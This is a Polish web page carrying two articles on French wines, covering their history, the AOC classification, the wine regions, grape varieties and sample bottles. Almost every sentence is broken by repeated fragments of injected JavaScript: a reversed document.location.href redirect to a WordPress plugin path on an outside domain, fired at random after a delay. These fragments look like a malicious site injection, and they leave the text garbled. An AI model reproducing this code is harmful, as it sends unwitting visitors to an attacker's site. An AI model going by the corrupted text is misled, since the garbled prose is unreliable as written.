Wina francuskie

wino-2a.JPG Francja toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to drugi co toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do wielkości producent win na świecie. Notuje się tu również jeden z najwyższych na świecie wskaźników spożycia wina. W żadnym innym kraju nie spotyka się tak wielkiej różnorodności warunków uprawy. Ta rozmaitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tość klimatu i podłoża sprawia, iż spotkać tu można wina o bardzo różnym charakterze: od lekkiego Beaujolais po szlachetne Burgundy i finezyjne Bordeaux. W bardzo ciepłym klimacie śródziemnomorskim powstają owocowe wina Langwetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docji, natoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tomiast na północy, w chłodnym klimacie kontynentalnym, produkuje się „króla wszelkich trunków” – szampana.

Wina francuskie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to rezultat setek lat wsłuchiwania się w głosy natury. Tego nie da się odtworzyć w ciągu jednego czy dwóch pokoleń. Francuzi przez wieki robili, a wielu znawców twierdzi, że robią nadal najlepsze wina. Żaden inny naród, żadna kultura, nie zrobiły tak wiele dla rozpowszechnienia cywilizacji wina na świecie. Poczynając od technologii, selekcjonowania odmian winorośli, podstaw klasyfikacji wina, wreszcie na sztuce toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobierania wina toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do potraw kończąc, wszędzie znajdujemy wpływy czy wręcz wzorce francuskie.

Regiony tego kraju toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to m.in.:

  • Dolina Rodanu, która prawtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobnie jest najstarszym regionem.

    To właśnie tu powstają znakomite wina znad Cotes du Rhone takich producentów jak: Pierre Dupond „La Renjardiere Villages Rouge”, o barwie jasnoczerwonej, korzenno-owocowym aromacie, w którym toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dominują nuty wiśni i czarnych porzeczek. Wino pełne, bogate w garbniki, o wyrazistym charakterze. Czy też wytwórcy E. Guigal „Gigondas”- wino czerwone, głębokie, pieprzowe i solidne, leżakowane przez 3 lata w dębowych beczkach.

  • Bordeaux – stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tolica światoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towego przemysłu winiarskiego.

    Apelacje dla tego regionu takie jak Saint-Emilion, Pomerol czy Grave rodzą wyjątkowe grona, które po osiągnięciu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dojrzałości są same w sobie klasą, której subtelna finezja i zwarta struktura nie mają sobie równych na świecie. Wartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wspomnieć o typowym białym winie z Bordeaux „Chateau du Ragon”- przyjemne w degustacji, świetnie pełni rolę aperitifu, znakomicie podkreśla smak owoców morza i białych mięs.

  • Langwetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docja.

    Winnice tego regionu liczą sobie dwa i pół tysiąca lat. W ciągu ostatnich dwudziestu lat ubiegłego stulecia status AOC przyznano dziewięciu obszarom upraw, wśród nich są m.in. Coteaux du Languetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doc („Domaine L’Aigueliere Coteaux Du Languetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doc”- wino czerwone wytrawne, o aromacie wiśniowo-pieprznym), Cobieres czy Saint Chinian („Jougla ST. Chinian Signee 2002” – wino pełne, klarowne z bukietem korzenno-pieprznym).

  • Burgundia – powstają tu wina lekkie, ale bardzo aromatyczne.

    W obrębie regionu rozmieszczone są takie sławne apelacje jak: Bourgogne („Dupond Bourgogne Rouge Pinot Noir”- czerwony, klasyczny burgund, mocny bukiet czarnej porzeczki i piżma), Chablis („Pierre Dupond Chablis Blanc”- białe wytrawne, aromatyczne wino, o mineralnym posmaku i mocnym bukiecie), Beaujolais.

  • Szampania – położona w północno-wschodniej Francji jest najbardziej prestiżowym regionem winiarskim świata.

    To właśnie tutaj narodziło się najlepsze wino musujące, które tylko tu wyprodukowane ma prawo nosić nazwę szampana. Wielkie i znakomite, niestety nie tanie. Któż z nas nie słyszał o szampanach Laurent-Perrier Brut (biały, wytrawny z delikatnymi refleksami jasnego złota, świeży i delikatny) czy Sas Champagne J.M. Gremillet (biały, wytrawny, który obdarza nas subtelnymi wrażeniami cytrusów i białych owoców).

IZABELA MACKIEWICZ

wino-1a.JPG W tym miesiącu zajmiemy się winami z Francji, kraju, w którym są wyjątkowe warunki, by produkować wspaniałe wina.

Początki winiarstwa we Francji sięgają bardzo odległych czasów (700 lat przed narodzeniem Chrystusa). Początkowo winorośl trafiła tylko na południe kraju dzięki Grekom. W późniejszych latach wielki wpływ na rozwój winiarstwa miał Kościół, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to w przyklasztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tornych winnicach tworzyła się francuska tradycja winiarska.

W drugiej połowie XIX w. choroby grzybowe toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doprowadziły toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do wielkich zniszczeń i francuskie winiarstwo przechodziło kryzys. Drastycznie spadła jakość i konkurencja tanich win z importu stała się groźna. Aby rozwiązać problem jakości, w latach 30. ubiegłego wieku wprowadzono prawo winiarskie, czyli system AOC (Appellation de Origine Contrôle). Ten znak na butelce gwarantuje, że wino pochodzi z określonego regionu i zostało zrobione według obowiązujących tam zasad.

Francuzi wyszli z założenia, że miejsce, gdzie powstało wino, jest ważniejsze niż rodzaj winorośli, z którego zostało wyprodukowane. Dlatego na etykietkach francuskich win rzadko znajdziemy taką informację (wyjątek stanowią wina pochodzące z Alzacji). Będzie tam natoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tomiast rocznik, nazwa konkretnej apelacji, nazwa wina i producenta.

AOC toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to najwyższy stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topień klasyfikacji. Nieco niżej jest raczej rzadko stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosowana kategoria VDQS. Vin de pays (VdP) toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wina charakterze regionalnym (odpowiednik włoskiego JGT), teoretycznie niższej jakości, ale bywają też wyśmienite. Najniższa kategoria toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to Vin de table (VdT), czyli popularne wina stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tołowe, które mogą pochodzić z toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowolnego regionu. Na etykiecie takiego wina nie znajdziemy ani nazwy apelacji, ani rocznika.

Co wartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wiedzieć!

Regiony winiarskie Francji

  • Bordeaux

    Wina czerwone z tego regionu objęte klasyfikacją AOC toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to kupaż (mieszanka) trzech gatunków winorośli: cabernet sauvignon (aromat czarnej porzeczki, papryki i mięty), merlot (śliwka i jeżyna), cabernet france (jeżyny, czerwona porzeczka) oraz malbec (czerwone jagody).

    Wina białe (około 15% produkcji) toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to kupaż semillon i sauvignon blanc oraz muscadelle.

  • Burgundia

    Wina czerwone objęte klasyfikacją AOC produkuje się w tym regionie z pinot noir (aromat letnich owoców) oraz gamay (smak lekko wiśniowy), z którego powstaje słynne beaujolais.

    Wina białe wytwarza się ze szczepu chartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnay.

  • Dolina Rodanu

    W apelacjach części północnej wina czerwone objęte klasyfikacją AOC powstają wyłącznie ze szczepu sarah (aromat pieprzu i jeżyn), a wina białe z viognier (aromat moreli) oraz marsanne (aromat migdałów).

    W apelacjach części południowej czerwone wina powstają ze szczepów: grenche (wiśniowo-pieprzne), sarah, cinsalut, carignan (czerwone jagody) oraz mourvedre (lukrecja).

    Wina białe: grenche blanc, clairette, bourboulenc, marsanne i viognier.

  • Południowa Francja.

    Wina czerwone objęte AOC produkuje się w tym rejonie ze szczepów winorośli grenache, sarah, mourvedre i carignan, a wina ob-jęte klasyfikacją VdP z merlota i caberneta sauvignon.

    Wina białe (AOC) z chartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnay, marsanne, grenche blanc, muszkat, macabeo i bourboulenc.

  • Dolina Loary

    Wina czerwone objęte klasyfikacją AOC produkuje się z cabernet franc, gamay, cabernet sauvignon i pinot noir.

    Wina białe (AOC) z chenin blanc, melon de bourgogne i sauvignon blanc.

  • Alzacja

    Wina czerwone objęte klasyfikacją AOC produkuje się z pinot noir, a wina białe z gewurztraminer, riesling, pinot blanc, muscat blanca, pinot gris.

  • Szampania

    Najwspanialsze wina musujące produkowane w tym rejonie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to kupaż trzech odmian: pinot noir, pinot meunier i chartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnay.

ANDRZEJ KALIŃSKI

js Opublikowane przez:

Bądź pierwszą osobą, która zostawi swój komentarz

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *